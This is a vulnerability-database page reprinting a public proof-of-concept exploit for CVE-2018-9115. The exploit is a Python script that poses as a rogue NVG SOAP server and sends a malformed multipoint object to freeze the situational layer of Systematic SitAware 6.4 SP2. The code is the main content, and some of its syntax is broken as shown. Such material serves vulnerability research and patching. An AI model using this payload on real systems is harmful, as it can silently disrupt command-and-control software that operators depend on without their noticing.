Vulners
Lucene search
Systematic SitAware - NVG Denial of Service Exploit
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2018-9115 | 4 Apr 201819:29 | – | attackerkb |
 | Systematic SitaWare Denial of Service Vulnerability | 2 Apr 201800:00 | – | cnvd |
 | CVE-2018-9115 | 4 Apr 201819:00 | – | cve |
 | CVE-2018-9115 | 4 Apr 201819:00 | – | cvelist |
 | Systematic SitAware - NVG Denial of Service | 30 Mar 201800:00 | – | exploitdb |
 | Systematic SitAware - NVG Denial of Service | 30 Mar 201800:00 | – | exploitpack |
 | CVE-2018-9115 | 4 Apr 201819:29 | – | nvd |
 | CVE-2018-9115 | 4 Apr 201819:29 | – | osv |
 | Systematic SitAware NVG Denial Of Service | 31 Mar 201800:00 | – | packetstorm |
 | Input validation | 4 Apr 201819:29 | – | prion |
10
# Exploit Title: SitAware NVG Denial of Service
# Date: 03/31/2018
# Exploit Author: 2u53
# Vendor Homepage: https://systematic.com/defence/products/c2/sitaware/
# Version: 6.4 SP2
# Tested on: Windows Server 2012 R2
# CVE: CVE-2018-9115
# Remarks: PoC needs bottlypy:
# https://bottlepy.org/docs/dev/
# https://raw.githubusercontent.com/bootlepy/bottle/master/bottle.py
# Systematic's SitAware does not validate input from other sources suffenciently. Incoming information utilizing
# the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means
# that the Situational Picture is no more updated. Unfortunately the user can not notice until
# he tries to work with the situational layer.
#!/bin/python
from bottle import post, run, request, response
LHOST = 127.0.0.1 # Local IP which the NVG server should use
LPORT = 8080 # Local Port on which the NVG server should listen
GET_CAPABILITIES = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetCapabilitiesResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg_capabilities version="1.5">
</ns4:nvg_capabilities>
</ns3:GetCapabilitiesResponse>
</soap:Body>
</soap:Envelope>'''
EVIL_NVG = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetNvgResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg version="1.5" classification="NATO UNCLASSIFIED">
<ns4:multipoint points="-0.01,0.01 0.02,-0.02 0.01,0.01" symbol="2525b:GFTPZ---------X"
label="EVILOBJ"/>
</ns4:nvg>
</ns3:GetNvgResponse>
</soap:Body>
</soap:Envelope>'''
@post('/nvg')
def soap():
action = dict(request.headers.items()).get('Soapaction')
action = action.replace('"', '')
print('Incoming connection')
response.content_type = 'text/xml;charset=utf-8'
if action.endswith('nvg/GetCapabilities'):
print('Sending capabilities to victim'...)
return GET_CAPABILITIES
print('Done! Waiting for NVG request...')
elif action.endswith('nvg/GetNvg'):
print('Sending evil NVG')
return EVIL_NVG
print('Done!')
else
print('Invalid request received')
run(host=LHOST, port=LPORT)
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Mar 2018 00:00Current
5.4Medium risk
Vulners AI Score5.4
EPSS0.20356